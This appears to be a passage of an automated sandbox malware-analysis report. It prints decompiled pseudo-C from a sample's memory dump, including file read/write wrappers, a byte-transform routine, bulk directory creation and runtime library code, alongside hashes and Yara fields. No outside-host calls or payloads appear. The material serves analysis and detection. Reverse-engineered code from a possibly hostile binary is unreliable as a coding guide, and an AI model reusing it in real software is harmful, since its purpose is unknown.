                                                                                                                              0x00405edc
                                                                                                                              0x00405edc
                                                                                                                              0x00405ee0
                                                                                                                              0x00405ec1
                                                                                                                              0x00405ec6
                                                                                                                              0x00405ed1
                                                                                                                              0x00405ed1
                                                                                                                              0x00405ee8

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49
                                                                                                                              • __lock_file.LIBCMT ref: 00405EEA
                                                                                                                                • Part of subcall function 004099B9: __lock.LIBCMT ref: 004099DE
                                                                                                                              • __fclose_nolock.LIBCMT ref: 00405EF5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2800547568-0
                                                                                                                              • Opcode ID: 3fc3483712a525cd96c649c7fe8882c4f1071fa44ab2443346d3945ffceb5c37
                                                                                                                              • Instruction ID: 1319f6abd8bd31aeb109ac581f584733085f37c6932f77d10f7e7e49bf8bce39
                                                                                                                              • Opcode Fuzzy Hash: 3fc3483712a525cd96c649c7fe8882c4f1071fa44ab2443346d3945ffceb5c37
                                                                                                                              • Instruction Fuzzy Hash: 76F09630915B15DAD720AB76D80675F7AA0EF00338F20863FE4A5B61D1CB7C5A019E9D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401C70, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 63%
                                                                                                                              			E00401C70(intOrPtr _a4) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t15;
				void* _t18;
				void* _t19;

				_v8 = 0;
				if(_a4 > 0) {
					__eflags = _a4 - 0xffffffff;
					if(__eflags > 0) {
						L4:
						E00401000( &_v20, 0);
						E00407185( &_v20, 0x42e190);
					} else {
						_push(_a4); // executed
						_t15 = E00404E60(_t18, _t19, __eflags); // executed
						_v8 = _t15;
						__eflags = _v8;
						if(_v8 == 0) {
							goto L4;
						}
					}
				} else {
					_a4 = 0;
				}
				return _v8;
			}








                                                                                                                              0x00401c76
                                                                                                                              0x00401c81
                                                                                                                              0x00401c8c
                                                                                                                              0x00401c90
                                                                                                                              0x00401ca7
                                                                                                                              0x00401cac
                                                                                                                              0x00401cba
                                                                                                                              0x00401c92
                                                                                                                              0x00401c95
                                                                                                                              0x00401c96
                                                                                                                              0x00401c9e
                                                                                                                              0x00401ca1
                                                                                                                              0x00401ca5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00401ca5
                                                                                                                              0x00401c83
                                                                                                                              0x00401c83
                                                                                                                              0x00401c83
                                                                                                                              0x00401cc5

                                                                                                                              APIs
                                                                                                                              • std::bad_exception::bad_exception.LIBCMTD ref: 00401CAC
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00401CBA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Exception@8Throwstd::bad_exception::bad_exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 953301-0
                                                                                                                              • Opcode ID: 03a4dc33bab742cb4b2cbf9fa26e5d2c586a382265b7fc5880515f717db27dfc
                                                                                                                              • Instruction ID: 272cba5438db19222770af037817bcfe661f5254e9f30bb7c7a9615170098c4c
                                                                                                                              • Opcode Fuzzy Hash: 03a4dc33bab742cb4b2cbf9fa26e5d2c586a382265b7fc5880515f717db27dfc
                                                                                                                              • Instruction Fuzzy Hash: C8F05E70844208EAEB10EFA0C845BAE7774AB00359F20866EA9156B2D0D7789A84C78A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040DDC3, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 82%
                                                                                                                              			E0040DDC3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t3;
				void* _t9;
				void* _t13;
				intOrPtr _t15;
				intOrPtr _t16;

				_push(8);
				_push(0x42dfa8);
				_t3 = E00408C20(__ebx, __edi, __esi);
				_t15 =  *0x431cdc; // 0x0
				if(_t15 == 0) {
					E0040B23F(6);
					 *((intOrPtr*)(_t13 - 4)) = 0;
					_t16 =  *0x431cdc; // 0x0
					if(_t16 == 0) {
						E0040D6E2(__ebx, _t9, __edi, 0, _t16); // executed
						 *0x431cdc =  *0x431cdc + 1;
					}
					 *((intOrPtr*)(_t13 - 4)) = 0xfffffffe;
					_t3 = E0040DE09();
				}
				return E00408C65(_t3);
			}








                                                                                                                              0x0040ddc3
                                                                                                                              0x0040ddc5
                                                                                                                              0x0040ddca
                                                                                                                              0x0040ddd1
                                                                                                                              0x0040ddd7
                                                                                                                              0x0040dddb
                                                                                                                              0x0040dde1
                                                                                                                              0x0040dde4
                                                                                                                              0x0040ddea
                                                                                                                              0x0040ddec
                                                                                                                              0x0040ddf1
                                                                                                                              0x0040ddf1
                                                                                                                              0x0040ddf7
                                                                                                                              0x0040ddfe
                                                                                                                              0x0040ddfe
                                                                                                                              0x0040de08

                                                                                                                              APIs
                                                                                                                              • __lock.LIBCMT ref: 0040DDDB
                                                                                                                                • Part of subcall function 0040B23F: __mtinitlocknum.LIBCMT ref: 0040B255
                                                                                                                                • Part of subcall function 0040B23F: __amsg_exit.LIBCMT ref: 0040B261
                                                                                                                                • Part of subcall function 0040B23F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00408368,0000000D), ref: 0040B269
                                                                                                                              • __tzset_nolock.LIBCMT ref: 0040DDEC
                                                                                                                                • Part of subcall function 0040D6E2: __lock.LIBCMT ref: 0040D704
                                                                                                                                • Part of subcall function 0040D6E2: ____lc_codepage_func.LIBCMT ref: 0040D74B
                                                                                                                                • Part of subcall function 0040D6E2: __getenv_helper_nolock.LIBCMT ref: 0040D76D
                                                                                                                                • Part of subcall function 0040D6E2: _free.LIBCMT ref: 0040D7A4
                                                                                                                                • Part of subcall function 0040D6E2: _strlen.LIBCMT ref: 0040D7AB
                                                                                                                                • Part of subcall function 0040D6E2: __malloc_crt.LIBCMT ref: 0040D7B2
                                                                                                                                • Part of subcall function 0040D6E2: _strlen.LIBCMT ref: 0040D7C8
                                                                                                                                • Part of subcall function 0040D6E2: _strcpy_s.LIBCMT ref: 0040D7D6
                                                                                                                                • Part of subcall function 0040D6E2: __invoke_watson.LIBCMT ref: 0040D7EB
                                                                                                                                • Part of subcall function 0040D6E2: _free.LIBCMT ref: 0040D7FA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1828324828-0
                                                                                                                              • Opcode ID: e4ed26e4e3832f4c199716b3ed4776796449f331cac361f6c8396f43c81a425a
                                                                                                                              • Instruction ID: d2da852c4dad56ae2dda77e0fdb5a89a1e09ad3610fc53b026902743cb7d952d
                                                                                                                              • Opcode Fuzzy Hash: e4ed26e4e3832f4c199716b3ed4776796449f331cac361f6c8396f43c81a425a
                                                                                                                              • Instruction Fuzzy Hash: 27E0EC34D81A909AD6257BE2AA0221DB630AB14B25F60617FB4413A5E2CE780985DBED
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00424F00, Relevance: 1.8, APIs: 1, Instructions: 269COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 96%
                                                                                                                              			E00424F00(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				void* _t68;
				void* _t170;

				_t135 = __esi;
				_t134 = __edi;
				_t69 = __ebx;
				E004091C0(0x431f98, 0, 0x104);
				 *0x4328c4(0x431f98, _a4);
				E00424E20(__ebx, __edi, __esi, _t170,  *0x43211c,  *0x43211c,  *0x432190); // executed
				E00424E20(__ebx, __edi, __esi, _t170,  *0x432680,  *0x432680,  *0x4322e4); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432620,  *0x432610,  *0x4325e8); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432344,  *0x432290,  *0x4325e8); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432194,  *0x432328,  *0x4325e8); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432144,  *0x432144,  *0x43263c); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432144,  *0x432144,  *0x432384); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432144,  *0x432478,  *0x432464); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432144,  *0x432478,  *0x4325f8); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432144,  *0x432478,  *0x432614); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432430,  *0x432430,  *0x4324e8); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x4326a4,  *0x4326a4,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432630,  *0x432630,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x4323e0,  *0x4323e0,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x43269c,  *0x43269c,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432510,  *0x432510,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432484,  *0x432484,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432698,  *0x432698,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432518,  *0x432518,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x43234c,  *0x43234c,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432238,  *0x432238,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432414,  *0x43216c,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x43268c,  *0x43268c,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432654,  *0x432654,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x4320c0,  *0x4320c0,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x4321ac,  *0x4321ac,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432530,  *0x432530,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432380,  *0x432380,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x43209c,  *0x43209c,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x4320cc,  *0x4320cc,  *0x432190); // executed
				E00424E20(_t69, _t134, _t135, _t170,  *0x432180,  *0x432180,  *0x432190); // executed
				_t68 = E00424E20(_t69, _t134, _t135, _t170,  *0x432300,  *0x432130,  *0x4321dc); // executed
				return _t68;
			}





                                                                                                                              0x00424f00
                                                                                                                              0x00424f00
                                                                                                                              0x00424f00
                                                                                                                              0x00424f0f
                                                                                                                              0x00424f20
                                                                                                                              0x00424f3a
                                                                                                                              0x00424f56
                                                                                                                              0x00424f72
                                                                                                                              0x00424f8e
                                                                                                                              0x00424faa
                                                                                                                              0x00424fc6
                                                                                                                              0x00424fe2
                                                                                                                              0x00424ffe
                                                                                                                              0x0042501a
                                                                                                                              0x00425036
                                                                                                                              0x00425052
                                                                                                                              0x0042506e
                                                                                                                              0x0042508a
                                                                                                                              0x004250a6
                                                                                                                              0x004250c2
                                                                                                                              0x004250de
                                                                                                                              0x004250fa
                                                                                                                              0x00425116
                                                                                                                              0x00425132
                                                                                                                              0x0042514e
                                                                                                                              0x0042516a
                                                                                                                              0x00425186
                                                                                                                              0x004251a2
                                                                                                                              0x004251be
                                                                                                                              0x004251da
                                                                                                                              0x004251f6
                                                                                                                              0x00425212
                                                                                                                              0x0042522e
                                                                                                                              0x0042524a
                                                                                                                              0x00425266
                                                                                                                              0x00425282
                                                                                                                              0x0042529e
                                                                                                                              0x004252a7

                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00424F0F
                                                                                                                                • Part of subcall function 00424E20: _memset.LIBCMT ref: 00424E41
                                                                                                                                • Part of subcall function 00424E20: _memset.LIBCMT ref: 00424E79
                                                                                                                                • Part of subcall function 00424E20: CreateDirectoryA.KERNEL32(?,00000000), ref: 00424EC0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CreateDirectory
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3764280050-0
                                                                                                                              • Opcode ID: 68618ae334612c316fc4654c644ec3a2389e9793a72b7eed8bfea142103e70cb
                                                                                                                              • Instruction ID: 6916c144791a522f3d991c651c15dc8eb940c2e24fba88255345f40e4dd8dd62
                                                                                                                              • Opcode Fuzzy Hash: 68618ae334612c316fc4654c644ec3a2389e9793a72b7eed8bfea142103e70cb
                                                                                                                              • Instruction Fuzzy Hash: D1A1BFB2A10510BBDB08DB99FF95C1633AAB7DC304714613CF708C7275EAB4A9158BAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00416F90, Relevance: 1.6, APIs: 1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E00416F90(intOrPtr __ecx, void* __edi, void* __esi, void* _a4, signed int _a8) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				signed char _t101;
				void* _t102;
				intOrPtr _t110;
				intOrPtr _t113;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t148;
				void* _t149;
				void* _t150;

				_t149 = __esi;
				_t148 = __edi;
				_v28 = __ecx;
				_v8 = _a4;
				if(( *(_v28 + 0x2d) & 0x000000ff) == 0) {
					L11:
					_t110 = _v28;
					__eflags =  *((intOrPtr*)(_t110 + 0x20));
					if( *((intOrPtr*)(_t110 + 0x20)) == 0) {
						_t128 = _v28;
						__eflags =  *((intOrPtr*)(_t128 + 4));
						if( *((intOrPtr*)(_t128 + 4)) == 0) {
							 *((intOrPtr*)(_v28 + 0x14)) = 0x1000000;
							__eflags = 0;
							return 0;
						}
						WriteFile( *(_v28 + 4), _v8, _a8,  &_v16, 0); // executed
						return _v16;
					}
					_t131 = _v28;
					_t113 = _v28;
					__eflags =  *((intOrPtr*)(_t131 + 0x24)) + _a8 -  *((intOrPtr*)(_t113 + 0x28));
					if( *((intOrPtr*)(_t131 + 0x24)) + _a8 <  *((intOrPtr*)(_t113 + 0x28))) {
						E00409240( *((intOrPtr*)(_v28 + 0x20)) +  *((intOrPtr*)(_v28 + 0x24)), _v8, _a8);
						 *((intOrPtr*)(_v28 + 0x24)) =  *((intOrPtr*)(_v28 + 0x24)) + _a8;
						return _a8;
					}
					 *((intOrPtr*)(_v28 + 0x14)) = 0x30000;
					return 0;
				}
				if( *(_v28 + 0x3c) != 0 &&  *((intOrPtr*)(_v28 + 0x40)) < _a8) {
					_v20 =  *(_v28 + 0x3c);
					_push(_v20);
					E00404E04();
					_t150 = _t150 + 4;
					 *(_v28 + 0x3c) = 0;
				}
				if( *(_v28 + 0x3c) == 0) {
					_push(_a8 << 1);
					_t102 = E00404E60(_t148, _t149, _a8 << 1);
					_t150 = _t150 + 4;
					_v24 = _t102;
					 *(_v28 + 0x3c) = _v24;
					 *((intOrPtr*)(_v28 + 0x40)) = _a8;
				}
				E00409240( *(_v28 + 0x3c), _a4, _a8);
				_t150 = _t150 + 0xc;
				_v12 = 0;
				while(1) {
					_t157 = _v12 - _a8;
					if(_v12 >= _a8) {
						break;
					}
					_t101 = E00415150( *( *(_v28 + 0x3c) + _v12) & 0x000000ff, _t157, _v28 + 0x30,  *( *(_v28 + 0x3c) + _v12) & 0x000000ff);
					_t150 = _t150 + 8;
					 *( *(_v28 + 0x3c) + _v12) = _t101;
					_v12 =  &(_v12->Internal);
				}
				_v8 =  *(_v28 + 0x3c);
				goto L11;
			}


















                                                                                                                              0x00416f90
                                                                                                                              0x00416f90
                                                                                                                              0x00416f96
                                                                                                                              0x00416f9c
                                                                                                                              0x00416fa8
                                                                                                                              0x00417072
                                                                                                                              0x00417072
                                                                                                                              0x00417075
                                                                                                                              0x00417079
                                                                                                                              0x004170cd
                                                                                                                              0x004170d0
                                                                                                                              0x004170d4
                                                                                                                              0x004170f9
                                                                                                                              0x00417100
                                                                                                                              0x00000000
                                                                                                                              0x00417100
                                                                                                                              0x004170eb
                                                                                                                              0x00000000
                                                                                                                              0x004170f1
                                                                                                                              0x0041707b
                                                                                                                              0x00417084
                                                                                                                              0x00417087
                                                                                                                              0x0041708a
                                                                                                                              0x004170af
                                                                                                                              0x004170c3
                                                                                                                              0x00000000
                                                                                                                              0x004170c6
                                                                                                                              0x0041708f
                                                                                                                              0x00000000
                                                                                                                              0x00417096
                                                                                                                              0x00416fb5
                                                                                                                              0x00416fc8
                                                                                                                              0x00416fce
                                                                                                                              0x00416fcf
                                                                                                                              0x00416fd4
                                                                                                                              0x00416fda
                                                                                                                              0x00416fda
                                                                                                                              0x00416fe8
                                                                                                                              0x00416fef
                                                                                                                              0x00416ff0
                                                                                                                              0x00416ff5
                                                                                                                              0x00416ff8
                                                                                                                              0x00417001
                                                                                                                              0x0041700a
                                                                                                                              0x0041700a
                                                                                                                              0x0041701c
                                                                                                                              0x00417021
                                                                                                                              0x00417024
                                                                                                                              0x00417036
                                                                                                                              0x00417039
                                                                                                                              0x0041703c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00417053
                                                                                                                              0x00417058
                                                                                                                              0x00417064
                                                                                                                              0x00417033
                                                                                                                              0x00417033
                                                                                                                              0x0041706f
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7db34355c1e7373ca9f5d5af4e993529e3b79410e2e7002c59469c393b38f908
                                                                                                                              • Instruction ID: e73484e99212a659770e5822a14c3b4fdeb48280c6f1479436057133cb9a09cf
                                                                                                                              • Opcode Fuzzy Hash: 7db34355c1e7373ca9f5d5af4e993529e3b79410e2e7002c59469c393b38f908
                                                                                                                              • Instruction Fuzzy Hash: A551C8B4E04209EFCB44CF98D481EAEBBB2BF88314F108159EA05AB345D735E981CF94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004019C0, Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 78%
                                                                                                                              			E004019C0(void* __eflags, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				void* __ecx;
				signed int _t50;
				intOrPtr _t61;
				void* _t66;
				intOrPtr* _t74;
				signed int _t109;
				void* _t110;

				_push(0xffffffff);
				_push(E00426770);
				_push( *[fs:0x0]);
				_push(_t74);
				_t50 =  *0x4301f4; // 0xe687535
				_push(_t50 ^ _t109);
				 *[fs:0x0] =  &_v16;
				_v20 = _t110 - 0x14;
				_v32 = _t74;
				_v28 = _a4 | 0x0000000f;
				if(E00401980(_v32) >= _v28) {
					if( *(_v32 + 0x14) >> 1 > _v28 / 3) {
						if( *(_v32 + 0x14) > E00401980(_v32) - ( *(_v32 + 0x14) >> 1)) {
							_v28 = E00401980(_v32);
						} else {
							_v28 = ( *(_v32 + 0x14) >> 1) +  *(_v32 + 0x14);
						}
					}
				} else {
					_v28 = _a4;
				}
				_v8 = 0;
				_t61 = E00401C20(_v32 + 0x18, _v28 + 1); // executed
				_v36 = _t61;
				_v24 = _v36;
				_v8 = 0xffffffff;
				if(_a8 > 0) {
					E00401100(_v24, E00401670(_v32), _a8);
				}
				E004015F0(_v32, 1, 0);
				 *_v32 = _v24;
				 *(_v32 + 0x14) = _v28;
				_t66 = E00401790(_v32, _a8);
				 *[fs:0x0] = _v16;
				return _t66;
			}

















                                                                                                                              0x004019c3
                                                                                                                              0x004019c5
                                                                                                                              0x004019d0
                                                                                                                              0x004019d1
                                                                                                                              0x004019d8
                                                                                                                              0x004019df
                                                                                                                              0x004019e3
                                                                                                                              0x004019e9
                                                                                                                              0x004019ec
                                                                                                                              0x004019f5
                                                                                                                              0x00401a03
                                                                                                                              0x00401a23
                                                                                                                              0x00401a3f
                                                                                                                              0x00401a5c
                                                                                                                              0x00401a41
                                                                                                                              0x00401a4f
                                                                                                                              0x00401a4f
                                                                                                                              0x00401a3f
                                                                                                                              0x00401a05
                                                                                                                              0x00401a08
                                                                                                                              0x00401a08
                                                                                                                              0x00401a5f
                                                                                                                              0x00401a73
                                                                                                                              0x00401a78
                                                                                                                              0x00401a7e
                                                                                                                              0x00401ae3
                                                                                                                              0x00401aee
                                                                                                                              0x00401b01
                                                                                                                              0x00401b06
                                                                                                                              0x00401b10
                                                                                                                              0x00401b1b
                                                                                                                              0x00401b23
                                                                                                                              0x00401b2d
                                                                                                                              0x00401b35
                                                                                                                              0x00401b43

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00401980: allocator.LIBCPMTD ref: 0040198F
                                                                                                                              • allocator.LIBCPMTD ref: 00401A73
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: allocator
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3447690668-0
                                                                                                                              • Opcode ID: 3699ba510369b678234fa6f2af8ebe35192483f0ad2ac9a48cc10a3850bc6069
                                                                                                                              • Instruction ID: 5b71811d262db75ffb008ab28cf385efa538223288d26617eb69107bad1ee037
                                                                                                                              • Opcode Fuzzy Hash: 3699ba510369b678234fa6f2af8ebe35192483f0ad2ac9a48cc10a3850bc6069
                                                                                                                              • Instruction Fuzzy Hash: CB410CB0E0410ADFCB04DF98D891AAFB7B6FB48354F20812AE915B73D1D638A941CF95
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004149F0, Relevance: 1.6, APIs: 1, Instructions: 101fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E004149F0(intOrPtr __ecx, void* _a4, long _a8) {
				long _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				int _t67;

				_v20 = __ecx;
				if( *((intOrPtr*)(_v20 + 0x84)) == 0) {
					if( *(_v20 + 0x7c) == 0) {
						 *((intOrPtr*)(_v20 + 0x14)) = 0x1000000;
						return 0;
					}
					_t67 = ReadFile( *(_v20 + 0x7c), _a4, _a8,  &_v16, 0); // executed
					_v12 = _t67;
					if(_v12 != 0) {
						 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v16;
						 *((intOrPtr*)(_v20 + 0x78)) = E00413060( *((intOrPtr*)(_v20 + 0x78)), _a4, _v16);
						return _v16;
					}
					return 0;
				}
				if( *((intOrPtr*)(_v20 + 0x8c)) <  *((intOrPtr*)(_v20 + 0x88))) {
					_v8 =  *((intOrPtr*)(_v20 + 0x88)) -  *((intOrPtr*)(_v20 + 0x8c));
					if(_v8 > _a8) {
						_v8 = _a8;
					}
					E00409240(_a4,  *((intOrPtr*)(_v20 + 0x84)) +  *((intOrPtr*)(_v20 + 0x8c)), _v8);
					 *((intOrPtr*)(_v20 + 0x8c)) =  *((intOrPtr*)(_v20 + 0x8c)) + _v8;
					 *((intOrPtr*)(_v20 + 0x74)) =  *((intOrPtr*)(_v20 + 0x74)) + _v8;
					 *((intOrPtr*)(_v20 + 0x78)) = E00413060( *((intOrPtr*)(_v20 + 0x78)), _a4, _v8);
					return _v8;
				}
				return 0;
			}








                                                                                                                              0x004149f6
                                                                                                                              0x00414a03
                                                                                                                              0x00414ab9
                                                                                                                              0x00414b19
                                                                                                                              0x00000000
                                                                                                                              0x00414b20
                                                                                                                              0x00414ad0
                                                                                                                              0x00414ad6
                                                                                                                              0x00414add
                                                                                                                              0x00414aef
                                                                                                                              0x00414b0c
                                                                                                                              0x00000000
                                                                                                                              0x00414b0f
                                                                                                                              0x00000000
                                                                                                                              0x00414adf
                                                                                                                              0x00414a1b
                                                                                                                              0x00414a36
                                                                                                                              0x00414a3f
                                                                                                                              0x00414a44
                                                                                                                              0x00414a44
                                                                                                                              0x00414a62
                                                                                                                              0x00414a79
                                                                                                                              0x00414a8b
                                                                                                                              0x00414aa8
                                                                                                                              0x00000000
                                                                                                                              0x00414aab
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00414AD0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: b246df8e3a9d2a9d5c35d4ca1609b0fdbbbcfdeb73313907d8776be4043166f5
                                                                                                                              • Instruction ID: ee08d54f1ce56c22ce831b4574c6a572aca0e1eed8468bf14319c86df82dd3cd
                                                                                                                              • Opcode Fuzzy Hash: b246df8e3a9d2a9d5c35d4ca1609b0fdbbbcfdeb73313907d8776be4043166f5
                                                                                                                              • Instruction Fuzzy Hash: 8741B8B5A00119EFCB04CF98C980FAEB7F5BF88304F208569E9299B355D731E941DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004148F0, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 74%
                                                                                                                              			E004148F0(void* __edi, void* __esi, void* __eflags, void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t36;
				intOrPtr _t41;
				intOrPtr _t44;
				signed int _t64;

				_t63 = __esi;
				_t62 = __edi;
				_push(0xffffffff);
				_push(E0042643B);
				_t36 =  *0x4301f4; // 0xe687535
				 *[fs:0x0] =  &_v16;
				_v32 = E00404E60(__edi, __esi, __eflags, 0x4098, _t36 ^ _t64,  *[fs:0x0]);
				_v8 = 0;
				if(_v32 == 0) {
					_v48 = 0;
				} else {
					_v48 = E00404050(_v32, _a16);
				}
				_v28 = _v48;
				_v8 = 0xffffffff;
				_v20 = _v28;
				_t41 = E00412CB0(_v20, _a4, _a8, _a12); // executed
				 *0x432ab0 = _t41;
				if( *0x432ab0 == 0) {
					_push(8);
					_v44 = E00404E60(_t62, _t63, __eflags);
					_v24 = _v44;
					 *_v24 = 2;
					 *((intOrPtr*)(_v24 + 4)) = _v20;
					_t44 = _v24;
				} else {
					_v40 = _v20;
					_v36 = _v40;
					if(_v36 == 0) {
						_v52 = 0;
					} else {
						_v52 = E00404240(_v36, 1);
					}
					_t44 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t44;
			}


















                                                                                                                              0x004148f0
                                                                                                                              0x004148f0
                                                                                                                              0x004148f3
                                                                                                                              0x004148f5
                                                                                                                              0x00414904
                                                                                                                              0x0041490f
                                                                                                                              0x00414922
                                                                                                                              0x00414925
                                                                                                                              0x00414930
                                                                                                                              0x00414943
                                                                                                                              0x00414932
                                                                                                                              0x0041493e
                                                                                                                              0x0041493e
                                                                                                                              0x0041494d
                                                                                                                              0x00414950
                                                                                                                              0x0041495a
                                                                                                                              0x0041496c
                                                                                                                              0x00414971
                                                                                                                              0x0041497d
                                                                                                                              0x004149ab
                                                                                                                              0x004149b5
                                                                                                                              0x004149bb
                                                                                                                              0x004149c1
